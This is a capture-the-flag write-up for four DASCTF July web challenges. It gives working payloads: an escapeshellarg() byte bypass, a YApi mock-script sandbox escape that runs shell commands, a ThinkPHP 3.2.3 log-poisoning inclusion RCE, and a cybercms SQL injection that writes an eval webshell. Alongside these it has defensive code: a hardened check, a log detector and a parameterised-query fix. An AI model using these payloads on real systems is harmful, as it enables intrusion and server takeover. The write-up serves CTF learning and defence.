21DASCTFJuly

web

Rank: 148. Working through the remaining challenges slowly, as time allows.

cat flag

```php
<?php
if (isset($_GET['cmd'])) {
    $cmd = $_GET['cmd'];
    // the deny-list check runs on the raw bytes of the parameter ...
    if (!preg_match('/flag/i', $cmd)) {
        // ... and the escaping that rewrites those bytes runs afterwards
        $cmd = escapeshellarg($cmd);
        system('cat ' . $cmd);
    }
} else {
    highlight_file(__FILE__);
}
?>
```

Since the command clearly runs, a first guess is to read the shell history file:

```bash
cat ~/.bash_history
```

escapeshellarg() turns the string into a single quoted shell argument, so quoting tricks are out and it is not going to be bypassed that way...

Notes

Only after reading a writeup did it become clear that the log has to be read; nginx's default access log path is /var/log/nginx/access.log.

escapeshellarg() can be bypassed with non-ASCII bytes such as %aa, %ba or %fa. The /flag/i check runs on the raw bytes, so fl%aaag does not match it, while escapeshellarg() drops any byte that is not a valid multibyte sequence in the process's locale (0xAA and 0xBA are UTF-8 continuation bytes and 0xFA is out of range, so they are invalid under both the C and UTF-8 locales) before quoting the rest, and the shell receives 'flag'.
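To make the check-order problem concrete, here is an added JavaScript model of the challenge. It is not code from the page or from the challenge: PHP's escapeshellarg() is modelled by a hypothetical escapeshellargCLocale() that drops every byte >= 0x80, a simplification of PHP skipping bytes that are not a valid multibyte sequence in the process's locale, which is what happens to %aa, %ba and %fa under both the C and UTF-8 locales. buildCommandHardened() is one way the same handler could be written so that the dropped bytes cannot change what the check saw.

```javascript
// Percent-decode to raw bytes the way PHP fills $_GET. decodeURIComponent()
// would throw on "%aa" because it is not valid UTF-8, which is the point:
// the filter sees the raw byte, not a character.
function percentDecodeToBytes(s) {
  const out = [];
  for (let i = 0; i < s.length; i++) {
    const hex = s.slice(i + 1, i + 3);
    if (s[i] === '%' && /^[0-9a-fA-F]{2}$/.test(hex)) {
      out.push(parseInt(hex, 16));
      i += 2;
    } else if (s[i] === '+') {
      out.push(0x20);
    } else {
      out.push(s.charCodeAt(i) & 0xff);
    }
  }
  return Buffer.from(out);
}

// Hypothetical model of escapeshellarg(): PHP skips bytes that are not a
// valid multibyte sequence in the current locale before single-quoting the
// argument and escaping embedded quotes. Treating every byte >= 0x80 as
// invalid is a simplification that matches %aa/%ba/%fa in C and UTF-8 locales.
function escapeshellargCLocale(bytes) {
  let out = "'";
  for (const b of bytes) {
    if (b >= 0x80) continue;                        // dropped, not escaped
    out += b === 0x27 ? "'\\''" : String.fromCharCode(b);
  }
  return out + "'";
}

// The challenge's order: regex on the raw bytes first, escape second.
// preg_match('/flag/i') without /u compares bytes, modelled by a latin1 view.
function buildCommandVulnerable(rawParam) {
  const cmd = percentDecodeToBytes(rawParam);
  if (/flag/i.test(cmd.toString('latin1'))) return null;   // "blocked"
  return 'cat ' + escapeshellargCLocale(cmd);
}

// Hardened order: normalise first, then validate the string that will
// actually reach the shell against an allow-list (plain file names only).
// The keyword check is kept only to mirror the challenge; the allow-list is
// what actually closes the gap.
function buildCommandHardened(rawParam) {
  const escaped = escapeshellargCLocale(percentDecodeToBytes(rawParam));
  const inner = escaped.slice(1, -1);              // strip the outer quotes
  if (!/^[A-Za-z0-9._-]+$/.test(inner)) return null;
  if (/flag/i.test(inner)) return null;
  return 'cat ' + escaped;
}
```

buildCommandVulnerable('flag') is blocked, buildCommandVulnerable('fl%aaag') yields `cat 'flag'`, and buildCommandHardened('fl%aaag') is blocked because the check runs on the post-escape string. The general lesson is that any deny-list applied before a transformation that can delete bytes is checking the wrong string.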

YApi

Version 1.9.1; a vulnerability in it had just been disclosed.

Register and create a project.

Command execution is possible from the mock script here:

```javascript
// `this` is the sandbox's global; its constructor chain leads back to the host Function
const sandbox = this
const ObjectConstructor = this.constructor
const FunctionConstructor = ObjectConstructor.constructor
// a function built by the host Function runs outside the sandbox and can see `process`
const myfun = FunctionConstructor('return process')
const process = myfun()
// the command's output becomes the mock response body
mockJson = process.mainModule.require("child_process").execSync("command").toString()
```

After saving, add an interface.

Open the interface.

The command's output is returned as the response, so the flag can be read with a direct command.

Thinkphp

v3.2.3: just take the RCE from the internet.

```
/index.php?m=--><?=phpinfo();?>
```

This has to be sent from Burp; typing it into the browser's address bar doesn't work, because the browser percent-encodes the tag characters and the log then receives encoded text instead of a PHP tag.

Then include the matching log file through the template filename; mind the log's date in the path:

```
index.php/?m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/Common/21_08_01.log
```

Command execution works.

Write a webshell.

The AntSword connection doesn't really work; oddly, it sometimes does.

Found the flag.
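As an added example (not from the writeup), the detection side of this chain: a scan over nginx combined-format access log lines that flags the request planting a PHP tag in the module name and the later request pulling the log back in through value[_filename]. The sample lines, IPs and timestamps are constructed for the example; the two malicious targets are the ones shown above.

```javascript
// Constructed sample lines in nginx "combined" format (not from a real target).
const SAMPLE_LINES = [
  '10.0.0.5 - - [01/Aug/2021:18:20:01 +0800] "GET /index.php?m=Home&c=Index&a=index HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
  '10.0.0.9 - - [01/Aug/2021:18:22:10 +0800] "GET /index.php?m=--><?=phpinfo();?> HTTP/1.1" 404 1024 "-" "Mozilla/5.0"',
  '10.0.0.9 - - [01/Aug/2021:18:22:33 +0800] "GET /index.php/?m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/Common/21_08_01.log HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
  '10.0.0.7 - - [01/Aug/2021:18:25:00 +0800] "GET /index.php?m=Home&c=Index&a=index&value[_filename]=%2e%2e/Runtime/Logs/Common/21_08_01.log HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
];

// ip, timestamp, method, request target, status
const LINE_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})/;

// Decode percent-escapes without throwing on junk, so "%3C%3F" and a raw
// "<?" are judged the same way.
function softDecode(s) {
  try { return decodeURIComponent(s); } catch (e) { return s; }
}

function classifyRequest(target) {
  const decoded = softDecode(target).toLowerCase();
  const findings = [];
  // half 1: a PHP open tag anywhere in the request line is log poisoning
  if (decoded.includes('<?')) findings.push('php-tag-in-request');
  // half 2: the template filename pointed at a log file or traversing upwards
  const idx = decoded.indexOf('_filename]=');
  if (idx !== -1) {
    const value = decoded.slice(idx + '_filename]='.length).split('&')[0];
    if (/runtime\/logs|\.log$/.test(value) || value.includes('../')) {
      findings.push('log-file-inclusion');
    }
  }
  return findings;
}

function scanAccessLog(lines) {
  const hits = [];
  for (const line of lines) {
    const m = LINE_RE.exec(line);
    if (!m) continue;
    const [, ip, ts, method, target, status] = m;
    for (const reason of classifyRequest(target)) {
      hits.push({ ip, ts, method, status: Number(status), reason });
    }
  }
  return hits;
}
```

scanAccessLog(SAMPLE_LINES) returns three hits: the poisoning request (note its 404; the module name is invalid, which is exactly why ThinkPHP writes it to the log) followed by two inclusion attempts. Correlating a php-tag-in-request hit with a later log-file-inclusion from the same source is the signal worth alerting on.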

cybercms

There is a publicly reported SQL injection in the admin login, and a directory scan turns up www.zip with the source.

```php
$user=fl_html(f1_vvv(fl_value($_POST['user'])));

$password=fl_html(f1_vvv(fl_value($_POST['password'])));
```

The f1_vvv and fl_value functions:

```php
function f1_vvv($str){
    if(empty($str)){return;}
    if(preg_match("/\ /i", $str)){
        exit('Go away,bad hacker!!');
    }
    preg_replace('/0x/i','',$str);   // return value discarded: "0x" is never removed
    return $str;
}

function fl_value($str){
    if(empty($str)){return;}
    return preg_replace('/select|insert | update | and | in | on | left | joins | delete |\%|\=|\.\.\/|\.\/| union | from | where | group | into |load_file
|outfile/i','',$str);
}
```

Reading the source: spaces are blocked outright, the 0x replacement is a no-op because preg_replace()'s result is never assigned back, and fl_value() strips a list of keywords in a single pass.

The column count is 5.

When writing the webshell through the login, remember that some of the keywords are replaced with the empty string.

Webshell

For example:

```
user=admin'/**/union/**/select/**/null,null,null,null,CHAR(60,63,112,104,112,32,101,118,97,108,40,36,95,80,79,83,84,91,99,109,100,93,41,63,62)/**/into/**/outfile/**/'/var/www/html/upload/shell.php'#&password=dd&code=&submit=true&submit.x=16&submit.y=29
```

(the CHAR() list spells out `<?php eval($_POST[cmd])?>`, so no tag or quote characters appear in the parameter itself)

Response:

```
bad!hacker!<br>sql:select id,admin_name,admin_password,admin_purview,is_disable from bees_admin where admin_name='admin'/**/union/**//**/null,null,null,null,CHAR(60,63,112,104,112,32,101,118,97,108,40,36,95,80,79,83,84,91,99,109,100,93,41,63,62)/**/into/**//**/'/var/www/html/upload/shell.php'#' limit 0,1
```

select and outfile are stripped (union and into survive because their patterns require surrounding spaces and the payload uses /**/ instead), so those two have to be double-written: selselectect and outoutfilefile each lose their inner copy and leave the keyword behind.
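The following added JavaScript re-implementation of fl_value() and f1_vvv() (mine, not the CMS's PHP; fl_html() is not shown on the page and is left out) reproduces why the doubled keywords survive, and ends with the parameterised query the filters were standing in for.

```javascript
// Pattern copied from fl_value(): note which words carry surrounding spaces
// (" union ", " into ") and which do not ("select", "outfile"). The "\n" before
// "|outfile" reproduces the line break inside the original pattern string.
const FL_VALUE_PATTERN =
  'select|insert | update | and | in | on | left | joins | delete |%|=|\\.\\./|\\./| union | from | where | group | into |load_file\\n|outfile';

function fl_value(str) {
  if (!str) return str;
  // preg_replace() makes one left-to-right pass; nothing is re-scanned after a removal,
  // so "selselectect" -> "select".
  return str.replace(new RegExp(FL_VALUE_PATTERN, 'gi'), '');
}

function f1_vvv(str) {
  if (!str) return str;
  if (/ /.test(str)) throw new Error('Go away,bad hacker!!');
  // Original: preg_replace('/0x/i', '', $str); with the result discarded,
  // so "0x" is not actually removed. Reproduced faithfully.
  return str;
}

// Same call order as the login handler: fl_value first, then f1_vvv.
function sanitizeLikeLogin(input) {
  return f1_vvv(fl_value(input));
}

// The vulnerable query as the page's error message shows it being built.
function buildLoginQueryVulnerable(user) {
  return "select id,admin_name,admin_password,admin_purview,is_disable from bees_admin where admin_name='" +
    sanitizeLikeLogin(user) + "' limit 0,1";
}

// The fix: keep the value out of the SQL text entirely. Returned as a
// statement/params pair, the shape any prepared-statement API consumes;
// the keyword filter becomes unnecessary.
function buildLoginQueryParameterised(user) {
  return {
    sql: 'select id,admin_name,admin_password,admin_purview,is_disable from bees_admin where admin_name=? limit 0,1',
    params: [user],
  };
}
```

With the single-written payload, sanitizeLikeLogin() returns the mangled `union/**//**/null` the page's response shows; with selselectect and outoutfilefile it returns the intact injection, and the concatenated query contains a live `union/**/select ... into/**/outfile`. A space anywhere still throws, which is why the payload uses /**/ as its separator.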

View the webshell.

Command execution.
